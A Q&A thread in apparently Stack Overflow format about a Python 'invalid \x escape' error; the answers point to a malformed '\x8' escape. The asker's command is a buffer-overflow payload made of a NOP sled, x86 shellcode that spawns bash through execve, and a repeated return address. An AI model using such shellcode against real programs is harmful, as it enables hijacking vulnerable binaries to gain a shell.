# ValueError: invalid \x escape

Tags: python

```
python -c 'print "\x90" * 348 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x8\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x30\xd1\xff\xff" * 35'
ValueError: invalid \x escape
```

Any idea what's causing this error ?

Answer (score 17, accepted):

you have `\x8\` in this string, change it to `\x08`

Comment: Could you explain why this fixes the problem

Comment: @NoelEvans In [§ 2.4.1 of the Python docs](https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals), it says about the format `\xhh`, "unlike in Standard C, exactly two hex digits are required."

Answer (score 7):

`\x8`, most likely. It should be two hex digits per escape.

Answer (score 4):

`\x8` is incorrect.

Answer (score 4):

Also note that this error can occur if you do not escape a `\` before an `x` in a multiline comment.

e.g. in Python 2.7:

```
def fn():
    """ Describing a file in the comments:
        C:\aaa\bbb\xxx\abc.txt
    """
    return None
fn()
```

raises the exception:

> ValueError: invalid \x escape

Can be fixed by changing `C:\aaa\bbb\xxx\abc.txt` to `C:\aaa\bbb\\xxx\abc.txt`